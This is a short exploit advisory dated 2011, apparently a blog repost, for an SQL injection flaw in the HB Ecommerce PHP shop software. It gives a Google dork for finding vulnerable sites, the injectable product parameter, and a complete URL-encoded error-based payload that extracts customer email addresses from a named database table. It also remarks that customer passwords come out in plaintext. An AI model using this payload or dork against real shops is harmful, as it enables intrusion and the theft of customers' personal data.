-------------[ HB ECOMMERCE SQL Injection Vulnerability ]--------------- ------------------------------------------------------------------------ ------------------------------------------------------------------------ [+] Exploit Title: [ HB ECOMMERCE SQL Injection Vulnerability ] [+] Google Dork: intext:'supplied by hb ecommerce' [+] Date: 26.05.2011 [+] Author: Tringle2011 [+] Software Link: http://www.hbecommerce.co.uk/ [+] Tested on: Debian GNU/Linux Testing(Wheezy) x64 [+] System: PHP ------------------------------------------------------------------------ ------------------------------------------------------------------------ vulnerable url: /templates1/view_product.php?product=3D Example: http://localhost/templates1/view_product.php?product=3D[SQL INJECTION] Get an Mail from the Customers Table: http://localhost/templates1/view_product.php?product=3D94746%20AND%20%28SEL= ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%= 2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2= CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2= 0LIMIT%205%2C1%29%2CCHAR%2858%2C109%2C103%2C100%2C58%29%2CFLOOR%28RAND%280%= 29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%2= 9a%29%20 note: customer passwords dumped in plaintext!
Friday, May 27, 2011
HB ECOMMERCE SQL Injection Vulnerability
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment